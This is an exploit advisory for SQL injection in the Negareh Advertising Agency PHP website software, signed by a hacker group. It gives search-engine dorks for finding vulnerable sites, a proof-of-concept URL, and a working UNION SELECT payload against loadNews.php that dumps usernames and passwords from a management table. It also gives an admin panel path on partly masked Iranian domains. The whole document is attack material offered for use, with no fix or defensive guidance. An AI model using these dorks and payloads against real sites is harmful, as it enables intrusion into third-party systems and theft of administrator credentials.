# Exploit Title: Negareh Advertising Agency Sql Injection
# Exploit Author: MR.XpR
# Risk : Normal
# Platforms : PHP
# Tested on: 7 , KAli
# Date : 2013
<------------------------------------------>
# D0rks :
inurl:loadNews.php?newsId=
intext:Powered by Negareh Advertising Agency.
# p0c :
http://wwwXsa.co.ir/loadNews.php?newsId=99%27
# D3mo User and Pass :
http://wwXa.co.ir/loadNews.php?newsId=999+union+select+1,2,3,group_concat%28username,0x3a,password%29,5,6,7,8,9,10,11+from+management
# Admin Pan3l :
http://www.kiXXsa.co.ir/admin/
# Pic Of Injection :
http://uploaXangig.com/Negareh_advertising_Agency_Sql_Injection.jpg
<------------------------------------------>
Greetz : V30Sharp , Moji Rider , Secret.Walker , K3rn3l , Samim.s , Farbod Ezrail , @3is , 3nist3in , Siamak.Black
Greetz : r0bb3r68 , M.R.S.CO , Mя.V3nd3tt4 , N4BIL , Ali_Sedaghat , MR.XHat , vahid4251 , HACKER OF FLOOD & All Member OF IRH